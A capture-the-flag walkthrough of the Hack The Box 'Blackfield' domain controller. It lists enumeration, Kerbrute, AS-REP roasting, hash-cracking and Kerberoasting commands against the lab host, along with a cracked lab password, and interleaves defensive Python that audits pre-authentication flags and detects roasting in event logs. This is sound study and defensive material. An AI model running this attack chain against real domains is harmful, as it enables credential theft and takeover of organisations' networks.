โœ’๏ธBlackfield

About

Blackfield is a hard difficulty Windows machine featuring Windows and Active Directory misconfigurations. Anonymous / Guest access to an SMB share is used to enumerate users. One user is found to have Kerberos pre-authentication disabled, which allows us to conduct an ASREPRoasting attack. This allows us to retrieve a hash of the encrypted material contained in the AS-REP, which can be subjected to an offline brute force attack in order to recover the plaintext password. With this user we can access an SMB share containing forensics artefacts, including an lsass process dump. This contains a username and a password for a user with WinRM privileges, who is also a member of the Backup Operators group. The privileges conferred by this privileged group are used to dump the Active Directory database and retrieve the hash of the primary domain administrator.

nmap -T4 -p- -A -Pn -oA scan 10.10.10.192

The nmap result gives us the domain name blackfield.local; save it in the /etc/hosts file. Also notice the key words here: Kerberos, msrpc, Active Directory LDAP, domain, smb (microsoft-ds).

Nmap LDAP scanning

nmap -n -sV --script "ldap* and not brute" -p 389 10.10.10.192

Nmap smb vuln scan

nmap -PN --script vuln -p139,445 10.10.10.192

Enum4Linux

It's also worth using this tool whilst we're dealing with AD environments and/or standalone Windows machines:

enum4linux -a 10.10.10.192 -u guest -p ''

Listing smb shares as a guest

smbmap -d BLACKFIELD.local -H 10.10.10.192 -u guest -p ""

Ldapsearch

This tool is useful for AD enumeration

ldapsearch -x -H ldap://10.10.10.192 -s base -b "" namingContexts

The naming context of the DC

Username enumeration via RID cycling. Use SMB instead of LDAP:

crackmapexec smb 10.10.10.192 --rid-brute

AS-REP roasting (key vulnerability). Once you have usernames:

impacket-GetNPUsers BLACKFIELD.local/ -dc-ip 10.10.10.192 -no-pass -usersfile users.txt
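The condition GetNPUsers looks for is the DONT_REQ_PREAUTH bit (0x400000) in each account's userAccountControl attribute. The following Python is an added example, not part of the original notes or of Impacket, showing the defender-side audit: it parses LDIF text of the kind ldapsearch prints and lists every enabled account that has pre-authentication disabled. The LDIF sample is constructed; "support" is the account the walkthrough identifies, the other names and their flag values are made up for the example.

```python
import re
from typing import Dict, List

# userAccountControl bit flags (from the documented ADS_USER_FLAG enumeration)
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002

# Constructed LDIF, shaped like the output of
# ldapsearch -x -H ldap://<dc> -D <user> -W -b "DC=BLACKFIELD,DC=local" \
#   "(objectClass=user)" sAMAccountName userAccountControl
SAMPLE_LDIF = """\
# search result
dn: CN=support,CN=Users,DC=BLACKFIELD,DC=local
sAMAccountName: support
userAccountControl: 4260352

dn: CN=alice,CN=Users,DC=BLACKFIELD,DC=local
sAMAccountName: alice
userAccountControl: 66048

dn: CN=Guest,CN=Users,DC=BLACKFIELD,DC=local
sAMAccountName: Guest
userAccountControl: 4194818
"""


def parse_ldif(text: str) -> List[Dict[str, str]]:
    """Parse the LDIF subset ldapsearch emits: blank-line separated entries of
    'attr: value' lines. Comments are skipped and folded lines are re-joined."""
    text = re.sub(r"\n ", "", text)  # LDIF folds long values onto a line starting with a space
    entries: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for line in text.splitlines():
        if line.startswith("#"):
            continue
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        attr, _, value = line.partition(":")
        current[attr.strip()] = value.strip()
    if current:
        entries.append(current)
    return entries


def decode_uac(value: int) -> List[str]:
    """Human-readable names of the flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def find_preauth_disabled(ldif_text: str) -> List[str]:
    """Enabled accounts whose userAccountControl has DONT_REQ_PREAUTH set.
    Disabled accounts are skipped: the KDC will not issue them a TGT anyway."""
    hits = []
    for entry in parse_ldif(ldif_text):
        uac = int(entry.get("userAccountControl", "0"))
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            hits.append(entry["sAMAccountName"])
    return hits


if __name__ == "__main__":
    for entry in parse_ldif(SAMPLE_LDIF):
        uac = int(entry["userAccountControl"])
        print(f'{entry["sAMAccountName"]:<10} {uac:>8} {", ".join(decode_uac(uac))}')
    print("pre-auth disabled:", find_preauth_disabled(SAMPLE_LDIF))
```

The same check can be pushed to the server side with the bitwise-AND matching rule in the LDAP filter, `(userAccountControl:1.2.840.113556.1.4.803:=4194304)`, so only affected accounts are returned; the Python above is useful when you already have an LDIF export to review.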

RPC anonymous login using RPCclient

rpcclient -U "" -N 10.10.10.192

Trying to list AD users with guest creds using Impacket GetADUsers tool

python3 GetADUsers.py -all BLACKFIELD.local/guest -dc-ip 10.10.10.192

LookUpSID

This tool works by brute-forcing SIDs (cycling through RIDs under the domain SID) to resolve all AD users.

Here I used guest credentials to retrieve all users within the AD env!

python2 lookupsid.py BLACKFIELD.local/[email protected]

python2 lookupsid.py BLACKFIELD.local/[email protected] | grep "SidTypeUser" | sed 's/.*BLACKFIELD\\\(.*\) (.*/\1/' > /root/machines/Blackfield/users.txt

Kerbrute

Kerbrute is a tool for user enumeration and password spraying. It tests against Kerberos and takes advantage of the way Kerberos responds differently to queries for valid and invalid users.

https://github.com/Sq00ky/attacktive-directory-tools

kerbrute userenum -d BLACKFIELD.local --dc BLACKFIELD.local /root/machines/Blackfield/users.txt

https://medium.com/@Taleen05/htb-blackfield-machine-walkthrough-f9517954bb90

With the users' list that we have, we're going to perform a so-called AS-REP Roasting attack, which is all about requesting a TGT for the accounts that have the Kerberos pre-authentication option disabled. To execute this attack we'll be using the Impacket GetNPUsers tool.

python2 GetNPUsers.py -no-pass -dc-ip 10.10.10.192 BLACKFIELD.local/ -usersfile /root/machines/Blackfield/users_only.txt

Now we have the AS-REP hash for the user support, which we can crack using John the Ripper.

john --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt asreproast.txt

john --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt /root/machines/Blackfield/GetNPUsers.txt
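Both techniques used so far, Kerbrute's user enumeration and the AS-REP roast, leave a recognisable trace in the domain controller's Security log as event 4768 (Kerberos authentication ticket requested): a non-existent principal produces a failure with status 0x6, and an AS-REP roast is a successful TGT request with pre-authentication type 0 and, with the default tool settings, an RC4 (0x17) ticket encryption type. The following Python is an added example, not part of the original notes or of any of the tools mentioned; it runs those two checks over a constructed, simplified list of 4768 records (real events would be parsed from the log's XML, and the field names here are the event's own). The source IP addresses and user names in the sample are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed records reduced to the 4768 fields the checks need.
# status: Kerberos result code; preauth: PreAuthType ("-" on failure,
# "2" = PA-ENC-TIMESTAMP, "0" = no pre-auth); etype: TicketEncryptionType.
SAMPLE_4768 = [
    # six different non-existent principals from one source within five seconds
    {"time": "2020-06-01T10:00:01", "user": "alice", "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2020-06-01T10:00:02", "user": "bob", "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2020-06-01T10:00:03", "user": "carol", "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2020-06-01T10:00:04", "user": "dave", "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2020-06-01T10:00:05", "user": "erin", "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2020-06-01T10:00:06", "user": "frank", "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    # a single typo from another host: not enough to flag
    {"time": "2020-06-01T10:00:07", "user": "jsmiht", "ip": "10.10.14.9", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    # a normal TGT request: pre-auth via timestamp, AES256 (0x12) ticket
    {"time": "2020-06-01T10:00:08", "user": "jsmith", "ip": "10.10.14.9", "status": "0x0", "preauth": "2", "etype": "0x12"},
    # TGT issued with no pre-authentication and an RC4 ticket: the AS-REP roast shape
    {"time": "2020-06-01T10:00:09", "user": "support", "ip": "10.10.14.5", "status": "0x0", "preauth": "0", "etype": "0x17"},
]


def detect_user_enum(events: List[Dict[str, str]], window_s: int = 60, threshold: int = 5) -> Dict[str, int]:
    """Sources that probed at least `threshold` distinct unknown principals
    (status 0x6) inside any `window_s`-second window. Returns {ip: count}."""
    by_ip: Dict[str, list] = defaultdict(list)
    for e in events:
        if e["status"].lower() == "0x6":
            by_ip[e["ip"]].append((datetime.fromisoformat(e["time"]), e["user"].lower()))
    hits: Dict[str, int] = {}
    for ip, probes in by_ip.items():
        probes.sort()
        for i, (t0, _) in enumerate(probes):
            # sliding window starting at each probe; names are de-duplicated
            names = {u for t, u in probes[i:] if t - t0 <= timedelta(seconds=window_s)}
            if len(names) >= threshold:
                hits[ip] = max(hits.get(ip, 0), len(names))
    return hits


def detect_asrep_roast(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Successful TGT requests with PreAuthType 0. Any such event deserves a
    look, since pre-auth is only skipped for accounts with DONT_REQ_PREAUTH;
    an RC4 (0x17) ticket is the strongest indicator of an offline-cracking run."""
    return [
        {"user": e["user"], "ip": e["ip"], "etype": e["etype"]}
        for e in events
        if e["status"].lower() == "0x0" and e["preauth"] == "0"
    ]


if __name__ == "__main__":
    print("user enumeration sources:", detect_user_enum(SAMPLE_4768))
    print("AS-REP roast candidates:", detect_asrep_roast(SAMPLE_4768))
```

Tune `threshold` and `window_s` to the environment: a handful of 0x6 failures from a workstation is ordinary typing, while dozens of distinct names from one address in a minute is a wordlist. The second check needs no threshold because pre-auth-less TGT issuance is rare by construction; the fix on the account side is to clear DONT_REQ_PREAUTH on accounts that do not genuinely need it.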

#00^BlackKnight ([email protected])

Tried to perform a Kerberoasting attack (which is all about retrieving a Service Ticket (ST/TGS) for any accounts that have an SPN set):

python2 GetUserSPNs.py BLACKFIELD.local/'support':'#00^BlackKnight' -request

With the acquired credentials, we proceeded to perform further enumeration of the target system using additional enumeration tools.

  • GetADUsers

I previously attempted to use this tool with guest credentials to enumerate valid users, but the account lacked sufficient privileges. We will now retry using the support account credentials.

python2 GetADUsers.py -all BLACKFIELD.local/support -dc-ip 10.10.10.192

The useful thing about this tool is that it gives us accurate information about users, such as emails, Password last set, and Last logon.

As you can see from the above images, there are 6 valid users, and the remaining users have NEVER logged in.

Using RPCclient again with support credentials allows us to further enumerate the AD env.

AD users:

rpcclient -U support 10.10.10.192

AD Groups.

Tried to create a new user with RPCclient, but wasn't able to:

createdomuser t0m1

I didn't know where to go, so I decided to use Google to find more enumeration tools. I found a blog that was talking about the ability to use the BloodHound tool without even having a shell! You just need valid credentials.

bloodhound-python -d BLACKFIELD.local -u support -p '#00^BlackKnight' -c all -ns 10.10.10.192

You can also run it inside a container using docker, just like this:

1- Build container:

docker build -t bloodhound .

2- Run container:

docker run -v ${PWD}:/bloodhound-data -it bloodhound

After executing the above command, I got these files as a result.

Open up your neo4j database from the terminal

neo4j console

And open up BloodHound GUI using the command bloodhound.
